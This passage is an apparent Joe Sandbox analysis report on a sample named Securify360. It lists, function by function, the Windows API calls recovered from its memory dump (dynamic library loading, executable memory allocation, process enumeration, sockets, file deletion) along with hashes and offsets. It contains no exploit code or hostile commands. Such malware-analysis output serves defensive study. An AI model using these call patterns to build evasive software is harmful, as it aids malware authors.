                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-1355242751
                                                                                              • Opcode ID: 35a84e6650352621d0f219dbddefa3f06d1349e887702f9e03a7debbe27e7f42
                                                                                              • Instruction ID: 01d777195219ed32584384c2437f45e3ee34d4b1b3743dbd6781c9e8a6b70b37
                                                                                              • Opcode Fuzzy Hash: 35a84e6650352621d0f219dbddefa3f06d1349e887702f9e03a7debbe27e7f42
                                                                                              • Instruction Fuzzy Hash: 98D012B0910712CFD7305F31D84870676D5AF45391B219C6EE4C6D6548DBB4D480C710
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B44,?,00FA49D4,?,?,00FA27AF,?,00000001), ref: 00FA4B85
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4B97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-3689287502
                                                                                              • Opcode ID: dc6d9e1592ab0120304788bfa51b972fc9569d9f8eda54bcdc5b37c6ef618549
                                                                                              • Instruction ID: ea3efd6a9ff077dfc31477240695f82bcc5e6347bcfc6a5e0187b220bf17c28b
                                                                                              • Opcode Fuzzy Hash: dc6d9e1592ab0120304788bfa51b972fc9569d9f8eda54bcdc5b37c6ef618549
                                                                                              • Instruction Fuzzy Hash: C6D012B0910712CFD7305F31D85870676D4AF45391F21883DE4C6D6508D7B4E480D720
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA5E3D), ref: 00FA55FE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA5610
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2574300362-192647395
                                                                                              • Opcode ID: ba4caac40a98666b741dff5b35da887a571ec1379a1ef4d85c2a2e4c0cc6bf8b
                                                                                              • Instruction ID: 9be7988cda7acc96120044ece6f54754a50a527b5ef77b78c6c4dfed1182e3d7
                                                                                              • Opcode Fuzzy Hash: ba4caac40a98666b741dff5b35da887a571ec1379a1ef4d85c2a2e4c0cc6bf8b
                                                                                              • Instruction Fuzzy Hash: 17D017B4A20B22CFEB309F32C80861676E4AF09765B21882EE4C6D6648E674C880CB50
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,01011696), ref: 01011455
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01011467
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: 27ee20b16382c0c247a252b7699dcb19d13446359c8c9d91f8dc492d3c3a07d7
                                                                                              • Instruction ID: 2beb7567aaf586bd4ec44af0b04c2856fe7efc8d9e425916b0285edfcc4fa7c9
                                                                                              • Opcode Fuzzy Hash: 27ee20b16382c0c247a252b7699dcb19d13446359c8c9d91f8dc492d3c3a07d7
                                                                                              • Instruction Fuzzy Hash: E8D0C770642312CFE3308F3AC94820276E4AF06681B20C83EE5D6D6158EBB8D0C0CB00
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,010093DE,?,01020980), ref: 010097D8
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 010097EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 2574300362-199464113
                                                                                              • Opcode ID: 26ac1f3ee4936f428add7ce6cdd4f7ba9b808cf4dbb2c5e66248383065af0113
                                                                                              • Instruction ID: 45e297ad7316d80eac49150e2a2b49d2cd2a20f2d1e2115377f92c6ca04b9b79
                                                                                              • Opcode Fuzzy Hash: 26ac1f3ee4936f428add7ce6cdd4f7ba9b808cf4dbb2c5e66248383065af0113
                                                                                              • Instruction Fuzzy Hash: A2D01771A10727CFE7319F36D898606B6E4BF08395F21887EE4CAE6148EA74C480CB11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e67de3056f7a4bc10f825e1d3ebd21fcbe454fcd72a533f9c05d9df925f8870a
                                                                                              • Instruction ID: c9d72b0f8a997a3d5087378d5d54462d8c0f1ad37681c0a3e2a9f69dd1207fc4
                                                                                              • Opcode Fuzzy Hash: e67de3056f7a4bc10f825e1d3ebd21fcbe454fcd72a533f9c05d9df925f8870a
                                                                                              • Instruction Fuzzy Hash: 5CC19075A00256EFCB14DF95C884EAEF7B5FF48710B208598E90ADB251DB31ED81DB90
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0100E7A7
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0100E7EA
                                                                                                • Part of subcall function 0100DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100DEAE
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0100E9EA
                                                                                              • _memmove.LIBCMT ref: 0100E9FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3659485706-0
                                                                                              • Opcode ID: 82e6cafc7cb35ebc7ab7e27aa43d4aa012bc1539820aaeca059f64197896c1fc
                                                                                              • Instruction ID: 711da25eaa85a213a12ab5d7c6de0acd6e4a7f798f442e5cc53963d2c4753b92
                                                                                              • Opcode Fuzzy Hash: 82e6cafc7cb35ebc7ab7e27aa43d4aa012bc1539820aaeca059f64197896c1fc
                                                                                              • Instruction Fuzzy Hash: 54C17A716083019FD755DF28C88096ABBE4FF89714F04896EF8999B391D731E946CF82
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 010087AD
                                                                                              • CoUninitialize.OLE32 ref: 010087B8
                                                                                                • Part of subcall function 0101DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,01008A0E,?,00000000), ref: 0101DF71
                                                                                              • VariantInit.OLEAUT32(?), ref: 010087C3
                                                                                              • VariantClear.OLEAUT32(?), ref: 01008A94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 780911581-0
                                                                                              • Opcode ID: 62a287472eb793c621279383bb170f8caaf16ad4ef0d26516160b9d1b7a209a7
                                                                                              • Instruction ID: 5fc298b51f3de25ce421f877700b1e1832c63e62f930cb60a792ad9287e5db0f
                                                                                              • Opcode Fuzzy Hash: 62a287472eb793c621279383bb170f8caaf16ad4ef0d26516160b9d1b7a209a7
                                                                                              • Instruction Fuzzy Hash: 7BA13975604B019FEB11EF54C881B2ABBE4BF99314F04884AF9959B3A1DB34FD41CB92
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8308
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8320
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,01020988,000000FF,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8345
                                                                                              • _memcmp.LIBCMT ref: 00FE8366
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: bed37d8f9514fcade2641851eceb584b0e88be4127f599ed217975a64b17711c
                                                                                              • Instruction ID: f3b30e7578002c27f71bd5629803d8b60c8aabe585f87cd1693e1f8169abc301
                                                                                              • Opcode Fuzzy Hash: bed37d8f9514fcade2641851eceb584b0e88be4127f599ed217975a64b17711c
                                                                                              • Instruction Fuzzy Hash: 9F811871A00109EFCB04DF95C984EEEB7B9FF89315F204598F50AAB250DB71AE06DB60
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              • Opcode ID: 17a0827afe7ffe6998484290e06373705cacbc6a3899ed0dff093db3381cab35
                                                                                              • Instruction ID: 5babb7c1738a9b64ea3727f6fecf6f5d9fa10208accd8e416db16c5c5b7ecb64
                                                                                              • Opcode Fuzzy Hash: 17a0827afe7ffe6998484290e06373705cacbc6a3899ed0dff093db3381cab35
                                                                                              • Instruction Fuzzy Hash: D15198316087829BDB24BF7ADC95B2DF3E5AF44318B30881FE546C72A1EB349840BB15
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0100F526
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0100F534
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0100F5F4
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0100F603
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2576544623-0
                                                                                              • Opcode ID: 45894c0152d2a8aefca050b73de38f2caba144761cafb288b1914639763e8215
                                                                                              • Instruction ID: ed0c48f8a8b737c849748fcc89f63f9a384ec9cb959abd37ddbcecc4eb5655fe
                                                                                              • Opcode Fuzzy Hash: 45894c0152d2a8aefca050b73de38f2caba144761cafb288b1914639763e8215
                                                                                              • Instruction Fuzzy Hash: 9551A9B1108311AFE321EF24DC81EABBBE8FF99704F00491DF58597291EB74A905DB92
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 01019E88
                                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 01019EBB
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01019F28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: c9ff5bc6eac4b3b20f84ec92b9418af73f39dfda489647dbc67dd744860152ce
                                                                                              • Instruction ID: a3aa28ec3a2c8ea26acb37afb78ee6f154cb24941d55d730e86d4510a0116134
                                                                                              • Opcode Fuzzy Hash: c9ff5bc6eac4b3b20f84ec92b9418af73f39dfda489647dbc67dd744860152ce
                                                                                              • Instruction Fuzzy Hash: D2518F34A00209EFDF61DF68C8909AE7BF6FF44324F208299F99597299D735AD41CB90
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                                                              • Instruction ID: 823e315d5c66afca2ac7cdb828842693dd1ccdbc0aad6d59538036becf04791c
                                                                                              • Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                                                              • Instruction Fuzzy Hash: C3419531B007069BDB288E6BCA909EF7BA9AF84360B24816DE855C7642D774BD41AF44
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FEA68A
                                                                                              • __itow.LIBCMT ref: 00FEA6BB
                                                                                                • Part of subcall function 00FEA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FEA976
                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FEA724
                                                                                              • __itow.LIBCMT ref: 00FEA77B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              • Opcode ID: 386bf8e994b2590c0c26bafd5ab83cb21351eda51b80a452745f407db3e9bc7c
                                                                                              • Instruction ID: 81e83b743ebb58c7dced96de7ae83787c9de5b62679830923717a8c98ee4e59e
                                                                                              • Opcode Fuzzy Hash: 386bf8e994b2590c0c26bafd5ab83cb21351eda51b80a452745f407db3e9bc7c
                                                                                              • Instruction Fuzzy Hash: 3541A4B4E00248AFDF21EF55CC55BEE7BB9EF49760F050029F905A3281DB74A944DBA2
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 010070BC
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 010070CC
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01007130
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0100713C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2214342067-0
                                                                                              • Opcode ID: 855db19571efd3f7a98d2bc00bbf50a25d7cc9acfcda03ea98f34e8a822b021d
                                                                                              • Instruction ID: 14a566246648d23de4fab6684abb672fd1e36b8c991d354fe4fe782b64e15c4b
                                                                                              • Opcode Fuzzy Hash: 855db19571efd3f7a98d2bc00bbf50a25d7cc9acfcda03ea98f34e8a822b021d
                                                                                              • Instruction Fuzzy Hash: B541C6757003006FFB21AF28DC86F6E77E5AB14B14F048058FA959B3C2D779AC019B91
                                                                                              APIs
                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,01020980), ref: 01006B92
                                                                                              • _strlen.LIBCMT ref: 01006BC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              • Opcode ID: cacc95b84446ce89acd10dae29f88439a5f4d1e232362506eb567899816bede3
                                                                                              • Instruction ID: be2563f531cd9028f844ffe7a1c4206ef80993ad6146c9eafa420ecb9181b5b4
                                                                                              • Opcode Fuzzy Hash: cacc95b84446ce89acd10dae29f88439a5f4d1e232362506eb567899816bede3
                                                                                              • Instruction Fuzzy Hash: 1D412671A00209AFEB15FB64CC91EFEB7AAEF54310F008154F84A9B2D2DB35AD11DB50
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FFBEE1
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00FFBF07
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FFBF2C
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FFBF58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: 9602ed2e95ca219a8fde52ccbb10d7126238ae2809bd2f6127375a5acc8ede74
                                                                                              • Instruction ID: d0bc880a39edc0c64371a6c5dfb0b84ac5b0e34677c4c4ff5072db68ec050c0b
                                                                                              • Opcode Fuzzy Hash: 9602ed2e95ca219a8fde52ccbb10d7126238ae2809bd2f6127375a5acc8ede74
                                                                                              • Instruction Fuzzy Hash: BE415B39600A14DFDB21EF14C845E59BBE1EF59324B19C489E9499B362CB38FC02EB91
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01018F03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
